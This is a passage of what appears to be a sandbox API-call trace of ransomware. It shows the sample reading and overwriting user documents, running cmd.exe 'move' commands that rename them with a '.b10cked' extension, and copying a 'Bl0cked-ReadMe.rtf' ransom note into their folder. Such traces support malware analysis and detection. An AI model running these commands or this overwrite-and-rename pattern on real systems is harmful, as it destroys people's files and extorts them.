lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x90e3 [0233.562] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x95cb [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x95cb [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.563] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.564] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x4ae4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x4ae4, lpOverlapped=0x0) returned 1 [0233.564] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.564] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x4ae4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x4ae4, lpOverlapped=0x0) returned 1 [0233.564] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-19172, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x4ae7 [0233.564] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x4ae4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x4ae4, lpOverlapped=0x0) returned 1 [0233.564] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-19172, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x4ae7 [0233.564] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x4ae4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x4ae4, lpOverlapped=0x0) returned 1 [0233.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oR2F.csv", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0233.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oR2F.csv", cchWideChar=8, lpMultiByteStr=0x131324c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oR2F.csv", lpUsedDefaultChar=0x0) returned 8 [0233.568] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x95cb [0233.568] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.568] CloseHandle (hObject=0x1b4) returned 1 [0233.569] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\oR2F.csv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv") returned 0x30 [0233.569] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0233.570] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xb08, dwThreadId=0xb2c)) returned 1 [0233.624] CloseHandle (hObject=0x120) returned 1 [0233.624] CloseHandle (hObject=0x1b4) returned 1 [0233.624] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0233.624] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.624] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount2=34) returned 3 [0233.624] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0233.624] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.624] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.624] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.624] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.624] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.624] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0233.625] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.625] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.625] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xdec, dwThreadId=0xde4)) returned 1 [0233.632] CloseHandle (hObject=0x120) returned 1 [0233.632] CloseHandle (hObject=0x1b4) returned 1 [0233.632] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0233.632] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.632] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.632] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.632] ReleaseMutex (hMutex=0xf8) returned 1 [0233.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.632] ReleaseMutex (hMutex=0xf8) returned 1 [0233.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.632] ReleaseMutex (hMutex=0xf8) returned 1 [0233.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.632] ReleaseMutex (hMutex=0xf8) returned 1 [0233.632] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\gaY66uwM4.ots" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\gay66uwm4.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29042195744) returned 1 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbaf7 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb60f [0233.634] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xbaf7 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xbaf7 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.635] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.635] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5d7a, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5d7a, lpOverlapped=0x0) returned 1 [0233.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.636] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5d7a, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5d7a, lpOverlapped=0x0) returned 1 [0233.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-23930, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5d7d [0233.636] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5d7a, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5d7a, lpOverlapped=0x0) returned 1 [0233.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-23930, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5d7d [0233.636] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5d7a, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5d7a, lpOverlapped=0x0) returned 1 [0233.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gaY66uwM4.ots", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0233.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gaY66uwM4.ots", cchWideChar=13, lpMultiByteStr=0x13131ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gaY66uwM4.ots", lpUsedDefaultChar=0x0) returned 13 [0233.640] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xbaf7 [0233.640] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.640] CloseHandle (hObject=0x1b4) returned 1 [0233.641] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\gaY66uwM4.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS") returned 0x2f [0233.642] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0233.642] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\GAY66U~1.OTS\" 